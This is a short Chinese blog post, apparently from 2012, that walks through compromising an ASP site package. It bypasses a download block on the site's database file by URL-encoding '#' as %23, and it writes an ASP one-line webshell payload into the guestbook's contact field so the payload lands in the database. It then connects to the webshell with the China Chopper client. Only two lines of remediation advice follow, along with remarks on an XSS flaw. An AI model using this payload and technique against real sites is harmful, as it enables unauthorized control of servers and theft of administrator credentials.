源码下载地址:
我也不知道这套站用的人多不多. 目测更新的版本也挺多的哈哈。
首先我大概看了一下网站的编辑器,然后到数据库.
看到数据库是asp后缀的。
然后就访问 /Data/#xk.mdb.asp
这样访问他返回一个错误http 500这样是不能下载的.
绕过的方法就是把#转成URL格式#就变成了%23
访问http:/www.2cto.com /Data/%23xk.mdb.asp
我就想能不能直接写一句话进去,这样就不用下载这个数据找管理工具打开看管理员的账号密码(账号密码是明文的,真奇葩).然后上后台去上传的来搞shell了.
于是我又返回到首页去,看到了有个留言板..
/zxly.asp
根据经验,一般asp留言板的都会存access数据库里。
看了一下guestbook字段 果然有。
利用方法是:到 /WriteBook.asp那留言,联系人填<%eval request(“#”)%> 其他随便填。
然后菜刀连接 /data/%23xk.mdb.asp 密码#
修复建议,
把asp改成mdb后缀.
留言板过滤各种xx. 我估计xss漏洞也有0.0貌似没过滤.写个csrf挺好玩的.等会去试试.
没啥亮点仅仅做下记录保存..
刚测试的确有xss…
Author:小乖&Mix0xrn
From: & &
Email:hx0c4k@gmail.com
Data:2012-07-18 ,涛涛电脑知识网,涛涛电脑知识网
